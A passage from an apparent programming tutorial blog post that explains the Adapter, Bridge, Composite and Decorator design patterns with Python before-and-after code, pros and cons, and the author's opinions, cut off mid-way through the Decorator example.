<span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">):</span> <span class="n">payment_details</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">method</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">card</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">number</span><span class="sh">"</span><span class="p">:</span> <span class="n">card_number</span><span class="p">}</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">gateway</span><span class="p">.</span><span class="nf">send_payment</span><span class="p">(</span><span class="n">amount</span><span class="p">,</span> <span class="n">payment_details</span><span class="p">)</span> <span class="c1"># Now your checkout function is simple and never changes </span><span class="k">def</span> <span class="nf">checkout</span><span class="p">(</span><span class="n">processor</span><span class="p">:</span> <span class="n">PaymentProcessor</span><span class="p">,</span> <span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">):</span> <span class="k">return</span> <span class="n">processor</span><span class="p">.</span><span class="nf">process</span><span class="p">(</span><span class="n">amount</span><span class="p">,</span> <span class="n">card_number</span><span class="p">)</span> <span class="c1"># Usage </span><span class="n">old_gateway</span> <span class="o">=</span> <span class="nc">OldPaymentGateway</span><span class="p">()</span> <span class="n">old_processor</span> <span class="o">=</span> <span class="nc">OldPaymentAdapter</span><span class="p">(</span><span class="n">old_gateway</span><span class="p">)</span> <span class="nf">checkout</span><span class="p">(</span><span class="n">old_processor</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="sh">"</span><span class="s">4111111111111111</span><span class="sh">"</span><span class="p">)</span> <span class="n">new_gateway</span> <span class="o">=</span> <span class="nc">NewPaymentGateway</span><span class="p">()</span> <span class="n">new_processor</span> <span class="o">=</span> <span class="nc">NewPaymentAdapter</span><span class="p">(</span><span class="n">new_gateway</span><span class="p">)</span> <span class="nf">checkout</span><span class="p">(</span><span class="n">new_processor</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="sh">"</span><span class="s">4111111111111111</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Add a third provider? Just create another adapter # checkout() never changes </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Allows incompatible interfaces to work together</li> <li>Doesn't require changing existing classes</li> <li>Keeps business logic separate from integration logic</li> <li>Makes testing easier</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Creates additional classes</li> <li>Can hide poor design choices</li> <li>Overuse leads to extra complexity</li> </ul> <p><strong>My Take:</strong></p> <p>The Adapter pattern is essential when working with real-world systems.</p> <p>You'll constantly integrate third-party libraries, legacy systems, and multiple vendors. Adapters keep your code clean and flexible.</p> <p>Every well-designed system should have an adapter layer for external dependencies. It's not optional if you care about maintainability.</p> <h3> 2. Bridge Pattern </h3> <p>The Bridge pattern decouples an abstraction from its implementation so they can vary independently.</p> <p>Think about database drivers.</p> <p>You want your application to work with any database. But each database has a different implementation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Application ↓ Abstraction (UserRepository interface) ↓ Bridge ↓ Concrete Implementation (PostgreSQL, MySQL, MongoDB) </code></pre> </div> <p>Without the Bridge pattern, your abstraction gets tightly coupled to specific implementations.</p> <p><strong>When to use it:</strong></p> <ul> <li>Avoiding permanent binding between abstraction and implementation</li> <li>Supporting multiple implementations that can change independently</li> <li>Reducing class explosion (especially with multiple dimensions)</li> <li>Allowing independent evolution of abstractions and implementations</li> <li>Plugin architectures</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Without Bridge, you end up with exponential class explosion </span> <span class="c1"># One dimension: Database </span><span class="k">class</span> <span class="nc">PostgreSQLUserRepository</span><span class="p">:</span> <span class="k">def</span> <span class="nf">find_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="nb">id</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Finding user </span><span class="si">{</span><span class="nb">id</span><span class="si">}</span><span class="s"> from PostgreSQL</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">MongoDBUserRepository</span><span class="p">:</span> <span class="k">def</span> <span class="nf">find_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="nb">id</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Finding user </span><span class="si">{</span><span class="nb">id</span><span class="si">}</span><span class="s"> from MongoDB</span><span class="sh">"</span> <span class="c1"># Another dimension: Caching </span><span class="k">class</span> <span class="nc">PostgreSQLUserRepositoryWithCache</span><span class="p">:</span> <span class="k">def</span> <span class="nf">find_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="nb">id</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">cache</span><span class="p">.</span><span class="nf">has</span><span class="p">(</span><span class="nb">id</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">cache</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="p">)</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Finding user </span><span class="si">{</span><span class="nb">id</span><span class="si">}</span><span class="s"> from PostgreSQL (with cache)</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">MongoDBUserRepositoryWithCache</span><span class="p">:</span> <span class="k">def</span> <span class="nf">find_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="nb">id</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">cache</span><span class="p">.</span><span class="nf">has</span><span class="p">(</span><span class="nb">id</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">cache</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="p">)</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Finding user </span><span class="si">{</span><span class="nb">id</span><span class="si">}</span><span class="s"> from MongoDB (with cache)</span><span class="sh">"</span> <span class="c1"># Add another dimension (encryption)? # Add another database? (SQLite) # Now you have 3 × 2 = 6 classes # Add one more dimension and you have 3 × 2 × 2 = 12 classes # This is the "class explosion" problem </span></code></pre> </div> <p><strong>Good code (with Bridge)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># Abstraction: What the client wants </span><span class="k">class</span> <span class="nc">UserRepository</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">implementation</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">implementation</span> <span class="o">=</span> <span class="n">implementation</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">find_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Concrete Abstraction </span><span class="k">class</span> <span class="nc">CachedUserRepository</span><span class="p">(</span><span class="n">UserRepository</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">implementation</span><span class="p">):</span> <span class="nf">super</span><span class="p">().</span><span class="nf">__init__</span><span class="p">(</span><span class="n">implementation</span><span class="p">)</span> <span class="n">self</span><span class="p">.</span><span class="n">cache</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">def</span> <span class="nf">find_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="k">if</span> <span class="n">user_id</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">cache</span><span class="p">:</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">cache</span><span class="p">[</span><span class="n">user_id</span><span class="p">]</span> <span class="n">result</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">implementation</span><span class="p">.</span><span class="nf">fetch_user</span><span class="p">(</span><span class="n">user_id</span><span class="p">)</span> <span class="n">self</span><span class="p">.</span><span class="n">cache</span><span class="p">[</span><span class="n">user_id</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span> <span class="k">return</span> <span class="n">result</span> <span class="k">class</span> <span class="nc">SimpleUserRepository</span><span class="p">(</span><span class="n">UserRepository</span><span class="p">):</span> <span class="k">def</span> <span class="nf">find_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">implementation</span><span class="p">.</span><span class="nf">fetch_user</span><span class="p">(</span><span class="n">user_id</span><span class="p">)</span> <span class="c1"># Implementation: How to fetch the data </span><span class="k">class</span> <span class="nc">DatabaseImplementation</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">fetch_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Concrete Implementations </span><span class="k">class</span> <span class="nc">PostgreSQLImplementation</span><span class="p">(</span><span class="n">DatabaseImplementation</span><span class="p">):</span> <span class="k">def</span> <span class="nf">fetch_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">User </span><span class="si">{</span><span class="n">user_id</span><span class="si">}</span><span class="s"> from PostgreSQL</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">MongoDBImplementation</span><span class="p">(</span><span class="n">DatabaseImplementation</span><span class="p">):</span> <span class="k">def</span> <span class="nf">fetch_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">User </span><span class="si">{</span><span class="n">user_id</span><span class="si">}</span><span class="s"> from MongoDB</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">SQLiteImplementation</span><span class="p">(</span><span class="n">DatabaseImplementation</span><span class="p">):</span> <span class="k">def</span> <span class="nf">fetch_user</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">User </span><span class="si">{</span><span class="n">user_id</span><span class="si">}</span><span class="s"> from SQLite</span><span class="sh">"</span> <span class="c1"># Usage: Mix and match any abstraction with any implementation </span><span class="n">postgres</span> <span class="o">=</span> <span class="nc">PostgreSQLImplementation</span><span class="p">()</span> <span class="n">simple_repo</span> <span class="o">=</span> <span class="nc">SimpleUserRepository</span><span class="p">(</span><span class="n">postgres</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">simple_repo</span><span class="p">.</span><span class="nf">find_user</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="c1"># User 1 from PostgreSQL </span> <span class="n">cached_repo</span> <span class="o">=</span> <span class="nc">CachedUserRepository</span><span class="p">(</span><span class="n">postgres</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">cached_repo</span><span class="p">.</span><span class="nf">find_user</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="c1"># User 1 from PostgreSQL </span><span class="nf">print</span><span class="p">(</span><span class="n">cached_repo</span><span class="p">.</span><span class="nf">find_user</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="c1"># Uses cache </span> <span class="c1"># Switch to MongoDB without changing repository code </span><span class="n">mongo</span> <span class="o">=</span> <span class="nc">MongoDBImplementation</span><span class="p">()</span> <span class="n">cached_repo</span> <span class="o">=</span> <span class="nc">CachedUserRepository</span><span class="p">(</span><span class="n">mongo</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">cached_repo</span><span class="p">.</span><span class="nf">find_user</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="c1"># User 1 from MongoDB </span> <span class="c1"># 2 Abstractions × 3 Implementations = 5 classes total # vs 6 classes without the pattern # And now you can add implementations without creating new abstraction classes </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Avoids permanent binding between abstraction and implementation</li> <li>Reduces class explosion</li> <li>Allows independent evolution of abstractions and implementations</li> <li>Supports runtime switching of implementations</li> <li>Single Responsibility Principle</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Adds an extra layer of abstraction</li> <li>Can be overkill for simple cases</li> <li>Makes code harder to follow if over-applied</li> </ul> <p><strong>My Take:</strong></p> <p>The Bridge pattern solves a real problem: class explosion when you have multiple independent dimensions of variation.</p> <p>Use it when you have:</p> <ul> <li>Multiple abstractions that need multiple implementations</li> <li>Need to support multiple variants that can change independently</li> </ul> <p>But don't use it for simple, one-dimensional cases. Start simple, add Bridge only when you see actual class explosion.</p> <h3> 3. Composite Pattern </h3> <p>The Composite pattern composes objects into tree structures to represent part-whole hierarchies.</p> <p>It lets clients treat individual objects and compositions of objects uniformly.</p> <p>Think about a file system:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/root ├── file1.txt ├── folder1 │ ├── file2.txt │ └── file3.txt └── folder2 └── file4.txt </code></pre> </div> <p>A file and a folder both have a <code>size()</code> method. A folder's size is the sum of all its contents.</p> <p>Without the Composite pattern, you handle files and folders differently everywhere.</p> <p>With it, you treat them the same.</p> <p><strong>When to use it:</strong></p> <ul> <li>File system structures</li> <li>Menu hierarchies</li> <li>Organization charts</li> <li>DOM trees</li> <li>Comment threads (parent comments with nested replies)</li> <li>Feature trees in games</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">File</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span> <span class="k">def</span> <span class="nf">get_size</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="k">class</span> <span class="nc">Folder</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="n">self</span><span class="p">.</span><span class="n">items</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">add_item</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">item</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">items</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">item</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_size</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="c1"># You need special logic to handle folders </span> <span class="n">total</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">items</span><span class="p">:</span> <span class="k">if</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="n">File</span><span class="p">):</span> <span class="n">total</span> <span class="o">+=</span> <span class="n">item</span><span class="p">.</span><span class="nf">get_size</span><span class="p">()</span> <span class="k">elif</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="n">Folder</span><span class="p">):</span> <span class="n">total</span> <span class="o">+=</span> <span class="n">item</span><span class="p">.</span><span class="nf">get_size</span><span class="p">()</span> <span class="c1"># Recursive but explicit </span> <span class="k">return</span> <span class="n">total</span> <span class="c1"># Client code is full of type checking </span><span class="k">def</span> <span class="nf">calculate_storage</span><span class="p">(</span><span class="n">item</span><span class="p">):</span> <span class="k">if</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="n">File</span><span class="p">):</span> <span class="k">return</span> <span class="n">item</span><span class="p">.</span><span class="nf">get_size</span><span class="p">()</span> <span class="k">elif</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="n">Folder</span><span class="p">):</span> <span class="n">total</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">sub_item</span> <span class="ow">in</span> <span class="n">item</span><span class="p">.</span><span class="n">items</span><span class="p">:</span> <span class="n">total</span> <span class="o">+=</span> <span class="nf">calculate_storage</span><span class="p">(</span><span class="n">sub_item</span><span class="p">)</span> <span class="c1"># Repeated logic </span> <span class="k">return</span> <span class="n">total</span> <span class="k">else</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">Unknown type</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p><strong>Good code (with Composite)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># Common interface for both files and folders </span><span class="k">class</span> <span class="nc">FileSystemComponent</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">get_size</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">get_name</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Leaf: File </span><span class="k">class</span> <span class="nc">File</span><span class="p">(</span><span class="n">FileSystemComponent</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span> <span class="k">def</span> <span class="nf">get_size</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">size</span> <span class="k">def</span> <span class="nf">get_name</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="c1"># Composite: Folder </span><span class="k">class</span> <span class="nc">Folder</span><span class="p">(</span><span class="n">FileSystemComponent</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="n">self</span><span class="p">.</span><span class="n">items</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">add_item</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">item</span><span class="p">:</span> <span class="n">FileSystemComponent</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">items</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">item</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_size</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="c1"># Uniform interface: treat files and folders the same </span> <span class="k">return</span> <span class="nf">sum</span><span class="p">(</span><span class="n">item</span><span class="p">.</span><span class="nf">get_size</span><span class="p">()</span> <span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">items</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_name</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="c1"># Client code is simple and consistent </span><span class="k">def</span> <span class="nf">print_structure</span><span class="p">(</span><span class="n">component</span><span class="p">:</span> <span class="n">FileSystemComponent</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">0</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s"> </span><span class="sh">"</span> <span class="o">*</span> <span class="n">indent</span> <span class="o">+</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">component</span><span class="p">.</span><span class="nf">get_name</span><span class="p">()</span><span class="si">}</span><span class="s"> (</span><span class="si">{</span><span class="n">component</span><span class="p">.</span><span class="nf">get_size</span><span class="p">()</span><span class="si">}</span><span class="s"> bytes)</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Only folders have items, but we don't need to check </span> <span class="k">if</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">component</span><span class="p">,</span> <span class="n">Folder</span><span class="p">):</span> <span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">component</span><span class="p">.</span><span class="n">items</span><span class="p">:</span> <span class="nf">print_structure</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="n">indent</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="c1"># Usage </span><span class="n">root</span> <span class="o">=</span> <span class="nc">Folder</span><span class="p">(</span><span class="sh">"</span><span class="s">root</span><span class="sh">"</span><span class="p">)</span> <span class="n">root</span><span class="p">.</span><span class="nf">add_item</span><span class="p">(</span><span class="nc">File</span><span class="p">(</span><span class="sh">"</span><span class="s">file1.txt</span><span class="sh">"</span><span class="p">,</span> <span class="mi">100</span><span class="p">))</span> <span class="n">folder1</span> <span class="o">=</span> <span class="nc">Folder</span><span class="p">(</span><span class="sh">"</span><span class="s">folder1</span><span class="sh">"</span><span class="p">)</span> <span class="n">folder1</span><span class="p">.</span><span class="nf">add_item</span><span class="p">(</span><span class="nc">File</span><span class="p">(</span><span class="sh">"</span><span class="s">file2.txt</span><span class="sh">"</span><span class="p">,</span> <span class="mi">200</span><span class="p">))</span> <span class="n">folder1</span><span class="p">.</span><span class="nf">add_item</span><span class="p">(</span><span class="nc">File</span><span class="p">(</span><span class="sh">"</span><span class="s">file3.txt</span><span class="sh">"</span><span class="p">,</span> <span class="mi">300</span><span class="p">))</span> <span class="n">root</span><span class="p">.</span><span class="nf">add_item</span><span class="p">(</span><span class="n">folder1</span><span class="p">)</span> <span class="n">root</span><span class="p">.</span><span class="nf">add_item</span><span class="p">(</span><span class="nc">File</span><span class="p">(</span><span class="sh">"</span><span class="s">file4.txt</span><span class="sh">"</span><span class="p">,</span> <span class="mi">150</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Total size: </span><span class="si">{</span><span class="n">root</span><span class="p">.</span><span class="nf">get_size</span><span class="p">()</span><span class="si">}</span><span class="s"> bytes</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># 750 </span><span class="nf">print_structure</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> </code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Simplifies client code</li> <li>Clients treat individual and composite objects uniformly</li> <li>Easy to add new component types</li> <li>Natural way to represent hierarchical data</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Can make design too general</li> <li>Performance overhead for large trees</li> <li>Difficult to restrict what can be added to composites</li> </ul> <p><strong>My Take:</strong></p> <p>Composite is one of the most elegant patterns when applied correctly.</p> <p>Any time you work with tree structures (file systems, UI components, organizational charts, comment threads), Composite makes your code dramatically simpler.</p> <p>The key insight: <strong>Treat the part and the whole the same way.</strong> This eliminates tons of type checking and special cases.</p> <p>Use it whenever you have hierarchical data. It's worth the abstraction.</p> <h3> 4. Decorator Pattern </h3> <p>The Decorator pattern attaches additional responsibilities to an object dynamically.</p> <p>It's an alternative to subclassing that allows behavior to be added at runtime.</p> <p>Imagine a coffee shop:</p> <ul> <li>Base coffee: $3</li> <li>Add cream: +$0.50</li> <li>Add caramel: +$0.75</li> <li>Add whipped cream: +$0.50</li> </ul> <p>Without decorators, you'd create:</p> <ul> <li>Coffee</li> <li>CoffeeWithCream</li> <li>CoffeeWithCaramel</li> <li>CoffeeWithWhippedCream</li> <li>CoffeeWithCreamAndCaramel</li> <li>CoffeeWithCreamAndCaramelAndWhippedCream</li> <li>... (class explosion again)</li> </ul> <p>With Decorator, you compose behaviors dynamically.</p> <p><strong>When to use it:</strong></p> <ul> <li>Adding features to objects without modifying them</li> <li>Adding responsibilities dynamically</li> <li>When subclassing would create too many classes</li> <li>I/O streams with different filters</li> <li>UI components with additional styling</li> <li>Middleware in web frameworks</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">Coffee</span><span class="p">:</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="mf">3.0</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Coffee</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">CoffeeWithCream</span><span class="p">(</span><span class="n">Coffee</span><span class="p">):</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">super</span><span class="p">().</span><span class="nf">cost</span><span class="p">()</span> <span class="o">+</span> <span class="mf">0.50</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">super</span><span class="p">().</span><span class="nf">description</span><span class="p">()</span> <span class="o">+</span> <span class="sh">"</span><span class="s">, Cream</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">CoffeeWithCaramel</span><span class="p">(</span><span class="n">Coffee</span><span class="p">):</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">super</span><span class="p">().</span><span class="nf">cost</span><span class="p">()</span> <span class="o">+</span> <span class="mf">0.75</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">super</span><span class="p">().</span><span class="nf">description</span><span class="p">()</span> <span class="o">+</span> <span class="sh">"</span><span class="s">, Caramel</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">CoffeeWithCreamAndCaramel</span><span class="p">(</span><span class="n">Coffee</span><span class="p">):</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">super</span><span class="p">().</span><span class="nf">cost</span><span class="p">()</span> <span class="o">+</span> <span class="mf">0.50</span> <span class="o">+</span> <span class="mf">0.75</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">super</span><span class="p">().</span><span class="nf">description</span><span class="p">()</span> <span class="o">+</span> <span class="sh">"</span><span class="s">, Cream, Caramel</span><span class="sh">"</span> <span class="c1"># Every combination needs a new class # With 5 toppings, you need 2^5 = 32 classes # This is unmaintainable </span></code></pre> </div> <p><strong>Good code (with Decorator)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># Component </span><span class="k">class</span> <span class="nc">Beverage</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Concrete Component </span><span class="k">class</span> <span class="nc">Coffee</span><span class="p">(</span><span class="n">Beverage</span><span class="p">):</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="mf">3.0</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Coffee</span><span class="sh">"</span> <span class="c1"># Decorator Base Class </span><span class="k">class</span> <span class="nc">BeverageDecorator</span><span class="p">(</span><span class="n">Beverage</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">beverage</span><span class="p">:</span> <span class="n">Beverage</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span> <span class="o">=</span> <span class="n">beverage</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span><span class="p">.</span><span class="nf">cost</span><span class="p">()</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span><span class="p">.</span><span class="nf">description</span><span class="p">()</span> <span class="c1"># Concrete Decorators </span><span class="k">class</span> <span class="nc">CreamDecorator</span><span class="p">(</span><span class="n">BeverageDecorator</span><span class="p">):</span> <span class="k">def</span> <span class="nf">cost</span><span 